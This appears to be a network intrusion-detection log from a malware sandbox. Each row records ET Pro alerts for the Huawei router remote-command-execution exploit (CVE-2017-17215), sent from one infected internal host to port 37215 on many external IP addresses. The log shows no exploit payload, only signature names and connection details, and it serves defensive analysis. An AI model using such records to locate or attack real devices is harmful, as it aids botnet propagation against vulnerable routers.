                                                    07/10/24-08:26:29.831965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254037215192.168.2.14197.185.150.41
                                                    07/10/24-08:26:48.019730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344637215192.168.2.14157.3.136.73
                                                    07/10/24-08:27:02.823605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698437215192.168.2.14157.12.168.147
                                                    07/10/24-08:27:27.128635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085437215192.168.2.1494.69.187.107
                                                    07/10/24-08:26:28.841879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819637215192.168.2.14157.186.145.245
                                                    07/10/24-08:26:18.023447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400037215192.168.2.14157.236.47.47
                                                    07/10/24-08:26:48.708629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096837215192.168.2.14157.112.179.99
                                                    07/10/24-08:27:23.831762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093237215192.168.2.14197.114.43.24
                                                    07/10/24-08:27:33.850737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5163637215192.168.2.1441.30.169.211
                                                    07/10/24-08:26:49.755286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364837215192.168.2.1441.192.60.196
                                                    07/10/24-08:26:34.234468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492837215192.168.2.1498.240.146.153
                                                    07/10/24-08:27:02.702114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.1441.142.200.12
                                                    07/10/24-08:26:43.864368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719837215192.168.2.1441.26.42.159
                                                    07/10/24-08:27:20.512534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570437215192.168.2.14120.233.7.113
                                                    07/10/24-08:26:28.773956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164037215192.168.2.1441.70.214.243
                                                    07/10/24-08:26:17.957871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356037215192.168.2.1441.186.42.150
                                                    07/10/24-08:27:14.881781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293437215192.168.2.14197.55.63.3
                                                    07/10/24-08:26:34.236926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142237215192.168.2.14169.27.174.140
                                                    07/10/24-08:26:57.632458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889037215192.168.2.14157.174.238.190
                                                    07/10/24-08:27:22.861640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091237215192.168.2.14197.78.148.158
                                                    07/10/24-08:27:31.558138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494437215192.168.2.14197.4.249.208
                                                    07/10/24-08:27:05.092511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.1441.225.173.129
                                                    07/10/24-08:27:02.716431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889637215192.168.2.1441.102.246.217
                                                    07/10/24-08:27:05.179313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796437215192.168.2.1441.117.51.0
                                                    07/10/24-08:27:13.859325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993037215192.168.2.14157.103.248.217
                                                    07/10/24-08:26:59.645443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598037215192.168.2.14157.156.2.78
                                                    07/10/24-08:27:31.552344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455837215192.168.2.14197.128.40.49
                                                    07/10/24-08:26:51.952619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686437215192.168.2.14157.73.27.169
                                                    07/10/24-08:27:31.435309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388637215192.168.2.1441.134.172.147
                                                    07/10/24-08:27:22.564471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363237215192.168.2.1441.52.197.206
                                                    07/10/24-08:26:20.113907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662037215192.168.2.14197.157.184.88
                                                    07/10/24-08:27:24.962148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702037215192.168.2.14197.91.119.251
                                                    07/10/24-08:26:59.580773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.1441.196.238.95
                                                    07/10/24-08:27:20.481124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481437215192.168.2.1441.116.188.67
                                                    07/10/24-08:26:14.815907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038837215192.168.2.14157.206.64.80
                                                    07/10/24-08:27:08.335280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784637215192.168.2.14204.156.95.105
                                                    07/10/24-08:27:19.239494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584237215192.168.2.14197.79.130.237
                                                    07/10/24-08:26:38.614287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287237215192.168.2.14157.189.124.68
                                                    07/10/24-08:27:28.139469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.14185.29.38.210
                                                    07/10/24-08:27:05.126538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100837215192.168.2.14157.120.254.91
                                                    07/10/24-08:26:26.586309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095837215192.168.2.14197.182.192.165
                                                    07/10/24-08:26:28.746677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823637215192.168.2.14157.11.97.23
                                                    07/10/24-08:26:28.886880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227037215192.168.2.14157.222.124.57
                                                    07/10/24-08:26:20.128775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473237215192.168.2.14133.141.216.1
                                                    07/10/24-08:26:42.380145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795637215192.168.2.14157.80.209.66
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744437215192.168.2.14157.151.193.81
                                                    07/10/24-08:26:55.470816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159237215192.168.2.1441.20.43.8
                                                    07/10/24-08:26:23.305980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515837215192.168.2.1472.224.7.27
                                                    07/10/24-08:26:43.611874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460637215192.168.2.14157.19.254.48
                                                    07/10/24-08:26:49.837904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974837215192.168.2.14197.30.91.22
                                                    07/10/24-08:26:52.033039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516037215192.168.2.14184.224.141.92
                                                    07/10/24-08:26:59.610357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437237215192.168.2.1441.126.208.1
                                                    07/10/24-08:26:14.824394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505237215192.168.2.1441.206.2.119
                                                    07/10/24-08:26:17.949707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765437215192.168.2.1441.66.215.84
                                                    07/10/24-08:26:13.790493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389837215192.168.2.1441.16.86.76
                                                    07/10/24-08:26:38.614472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061037215192.168.2.14197.202.174.156
                                                    07/10/24-08:26:14.623389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335237215192.168.2.14157.18.107.179
                                                    07/10/24-08:27:22.848965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563837215192.168.2.14157.178.19.206
                                                    07/10/24-08:27:17.041002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924837215192.168.2.1441.227.220.193
                                                    07/10/24-08:26:41.517439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330437215192.168.2.14197.109.166.250
                                                    07/10/24-08:27:19.204626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290237215192.168.2.1441.33.217.97
                                                    07/10/24-08:26:38.518117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112237215192.168.2.14157.63.177.14
                                                    07/10/24-08:26:36.346180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037837215192.168.2.14197.75.48.177
                                                    07/10/24-08:27:20.488674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412637215192.168.2.14151.27.204.126
                                                    07/10/24-08:26:11.446922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535837215192.168.2.14197.160.40.71
                                                    07/10/24-08:26:14.763197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895437215192.168.2.1441.183.124.229
                                                    07/10/24-08:26:22.295095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104437215192.168.2.14197.248.179.96
                                                    07/10/24-08:26:43.927826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033837215192.168.2.14135.236.244.79
                                                    07/10/24-08:27:23.969982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936037215192.168.2.14151.69.83.156
                                                    07/10/24-08:27:33.925120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384237215192.168.2.1441.55.3.249
                                                    07/10/24-08:27:20.417090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328837215192.168.2.14197.197.199.214
                                                    07/10/24-08:27:22.749438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417437215192.168.2.14177.99.133.145
                                                    07/10/24-08:26:20.172014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279437215192.168.2.14157.193.136.92
                                                    07/10/24-08:26:34.208199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529437215192.168.2.14208.229.122.242
                                                    07/10/24-08:26:41.501258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334437215192.168.2.14197.53.163.221
                                                    07/10/24-08:26:42.374424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024437215192.168.2.1413.152.71.219
                                                    07/10/24-08:27:30.549357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865637215192.168.2.14108.48.233.15
                                                    07/10/24-08:27:22.773941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732637215192.168.2.14157.85.194.62
                                                    07/10/24-08:26:17.967012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700237215192.168.2.14197.122.66.182
                                                    07/10/24-08:26:47.919508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520237215192.168.2.1425.14.37.173
                                                    07/10/24-08:27:30.518988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914037215192.168.2.14219.247.255.149
                                                    07/10/24-08:27:23.956633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576837215192.168.2.14197.170.18.72
                                                    07/10/24-08:26:20.189377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595637215192.168.2.14157.11.99.109
                                                    07/10/24-08:26:14.823884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586237215192.168.2.14157.230.20.204
                                                    07/10/24-08:26:25.433528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042837215192.168.2.14197.184.31.203
                                                    07/10/24-08:26:43.820338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837037215192.168.2.14197.190.236.249
                                                    07/10/24-08:26:36.425072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617637215192.168.2.14197.64.26.233
                                                    07/10/24-08:26:47.933430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679637215192.168.2.14197.216.98.69
                                                    07/10/24-08:27:11.550512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776037215192.168.2.1441.85.141.30
                                                    07/10/24-08:27:19.273517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.14197.112.170.66
                                                    07/10/24-08:26:38.645835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721637215192.168.2.14213.199.192.43
                                                    07/10/24-08:27:10.739148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305237215192.168.2.14197.220.36.165
                                                    07/10/24-08:26:14.757034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121237215192.168.2.14133.93.119.234
                                                    07/10/24-08:26:59.877508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907837215192.168.2.1441.113.155.85
                                                    07/10/24-08:26:47.943486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174237215192.168.2.14197.116.255.48
                                                    07/10/24-08:26:29.781419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144037215192.168.2.14157.175.145.173
                                                    07/10/24-08:26:47.837566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449637215192.168.2.14197.49.180.176
                                                    07/10/24-08:26:14.819807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973637215192.168.2.14197.135.88.181
                                                    07/10/24-08:27:31.570253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289637215192.168.2.14197.255.106.8
                                                    07/10/24-08:26:11.592193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065037215192.168.2.14157.154.166.148
                                                    07/10/24-08:27:11.612817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.14177.51.62.7
                                                    07/10/24-08:26:20.186875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834637215192.168.2.14207.97.201.53
                                                    07/10/24-08:27:11.504435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286837215192.168.2.1441.219.174.222
                                                    07/10/24-08:26:25.428248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347437215192.168.2.14157.187.123.31
                                                    07/10/24-08:26:43.543257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731837215192.168.2.14197.55.90.227
                                                    07/10/24-08:27:33.802521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938037215192.168.2.14197.181.61.105
                                                    07/10/24-08:26:52.077258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870037215192.168.2.14157.160.165.183
                                                    07/10/24-08:26:25.433410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569437215192.168.2.14197.132.60.165
                                                    07/10/24-08:26:25.449371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086437215192.168.2.14168.81.17.84
                                                    07/10/24-08:27:17.047442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769037215192.168.2.14157.113.43.155
                                                    07/10/24-08:26:33.260181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14197.125.182.198
                                                    07/10/24-08:27:31.442738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943037215192.168.2.1441.242.247.62
                                                    07/10/24-08:27:30.487311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820437215192.168.2.1441.36.207.67
                                                    07/10/24-08:26:43.848073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956837215192.168.2.14182.111.31.197
                                                    07/10/24-08:27:02.883243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159037215192.168.2.1441.8.178.52
                                                    07/10/24-08:26:23.355278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748437215192.168.2.1448.240.164.56
                                                    07/10/24-08:27:24.949223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302637215192.168.2.1441.86.35.47
                                                    07/10/24-08:26:22.221406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325637215192.168.2.14157.57.174.23
                                                    07/10/24-08:26:55.421781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355437215192.168.2.14197.20.9.72
                                                    07/10/24-08:26:52.073471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070237215192.168.2.14197.116.80.110
                                                    07/10/24-08:27:02.851731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950637215192.168.2.14157.105.223.187
                                                    07/10/24-08:27:11.569175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437637215192.168.2.14197.172.105.218
                                                    07/10/24-08:26:22.270061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861437215192.168.2.14197.190.216.75
                                                    07/10/24-08:26:59.781725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053237215192.168.2.14157.149.95.175
                                                    07/10/24-08:27:13.905165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978237215192.168.2.14157.184.127.102
                                                    07/10/24-08:26:41.430084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555837215192.168.2.1441.118.160.0
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723637215192.168.2.1460.212.68.225
                                                    07/10/24-08:27:13.865748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897237215192.168.2.1441.4.127.118
                                                    07/10/24-08:26:36.367813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649637215192.168.2.14197.231.99.21
                                                    07/10/24-08:26:11.605527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862237215192.168.2.14197.202.24.221
                                                    07/10/24-08:27:27.094763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727037215192.168.2.1441.36.187.180
                                                    07/10/24-08:26:25.477490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141437215192.168.2.14163.65.250.83
                                                    07/10/24-08:27:32.549149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945837215192.168.2.14217.200.104.83
                                                    07/10/24-08:26:34.207710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483037215192.168.2.14154.98.59.31
                                                    07/10/24-08:27:05.072546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023437215192.168.2.14197.118.241.2
                                                    07/10/24-08:27:22.900850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908437215192.168.2.144.202.212.150
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760437215192.168.2.1441.4.170.250
                                                    07/10/24-08:26:13.743815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684437215192.168.2.1441.132.43.2
                                                    07/10/24-08:26:11.616145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.14197.21.220.29
                                                    07/10/24-08:27:22.792743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313437215192.168.2.14157.93.219.82
                                                    07/10/24-08:26:47.953333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817637215192.168.2.1441.70.79.158
                                                    07/10/24-08:27:11.558297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711037215192.168.2.14197.73.199.184
                                                    07/10/24-08:26:59.675838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898037215192.168.2.14181.121.95.154
                                                    07/10/24-08:26:36.358429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020437215192.168.2.14197.49.180.164
                                                    07/10/24-08:27:02.749504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.14157.59.84.60
                                                    07/10/24-08:26:43.646157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265637215192.168.2.14141.169.91.115
                                                    07/10/24-08:26:38.551619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562637215192.168.2.14157.47.164.212
                                                    07/10/24-08:27:10.561915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187637215192.168.2.1441.68.215.161
                                                    07/10/24-08:26:20.132351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952837215192.168.2.14197.79.62.138
                                                    07/10/24-08:27:05.216046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141237215192.168.2.1441.41.1.249
                                                    07/10/24-08:27:30.407360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683637215192.168.2.14197.3.118.236
                                                    07/10/24-08:26:53.165242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970837215192.168.2.14197.226.199.21
                                                    07/10/24-08:27:05.141493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725237215192.168.2.14110.39.215.246
                                                    07/10/24-08:27:31.538711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431437215192.168.2.14197.110.144.64
                                                    07/10/24-08:26:20.172679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922837215192.168.2.14117.35.158.23
                                                    07/10/24-08:26:20.148886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454637215192.168.2.1441.140.166.42
                                                    07/10/24-08:26:55.297607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353437215192.168.2.14157.251.134.135
                                                    07/10/24-08:27:34.132992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585637215192.168.2.14149.231.132.140
                                                    07/10/24-08:27:02.857576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957437215192.168.2.14157.10.84.58
                                                    07/10/24-08:27:22.900850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14129.225.98.156
                                                    07/10/24-08:27:27.063250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976437215192.168.2.14157.77.88.141
                                                    07/10/24-08:27:33.922247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998037215192.168.2.1489.89.131.93
                                                    07/10/24-08:26:25.453376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014437215192.168.2.1441.173.230.203
                                                    07/10/24-08:27:27.142415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125237215192.168.2.14101.63.109.65
                                                    07/10/24-08:27:19.222748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358237215192.168.2.14197.184.153.59
                                                    07/10/24-08:26:26.603231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043437215192.168.2.14197.236.151.102
                                                    07/10/24-08:26:38.624887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704237215192.168.2.14157.247.222.168
                                                    07/10/24-08:27:14.675779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6080237215192.168.2.14211.15.136.160
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683237215192.168.2.14197.232.240.249
                                                    07/10/24-08:27:08.415369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596837215192.168.2.14157.61.58.243
                                                    07/10/24-08:27:19.236089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115437215192.168.2.1441.191.225.78
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865037215192.168.2.14157.100.160.12
                                                    07/10/24-08:26:28.782000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827837215192.168.2.1417.192.213.201
                                                    07/10/24-08:27:20.460857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758437215192.168.2.1486.30.184.114
                                                    07/10/24-08:26:20.147730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839837215192.168.2.14157.18.40.11
                                                    07/10/24-08:27:24.879999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025037215192.168.2.14197.218.163.143
                                                    07/10/24-08:27:20.507849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009837215192.168.2.14161.137.100.225
                                                    07/10/24-08:26:59.539411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4645837215192.168.2.1460.60.227.153
                                                    07/10/24-08:27:30.515312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.14197.85.123.173
                                                    07/10/24-08:26:11.107055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944037215192.168.2.14197.45.3.44
                                                    07/10/24-08:26:36.322719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756237215192.168.2.14197.248.101.242
                                                    07/10/24-08:26:47.992323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407837215192.168.2.14197.76.69.23
                                                    07/10/24-08:26:13.816955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407037215192.168.2.14197.153.14.104
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922237215192.168.2.14157.236.186.231
                                                    07/10/24-08:27:14.793732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682437215192.168.2.1441.235.118.210
                                                    07/10/24-08:26:17.953506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765437215192.168.2.14197.146.199.170
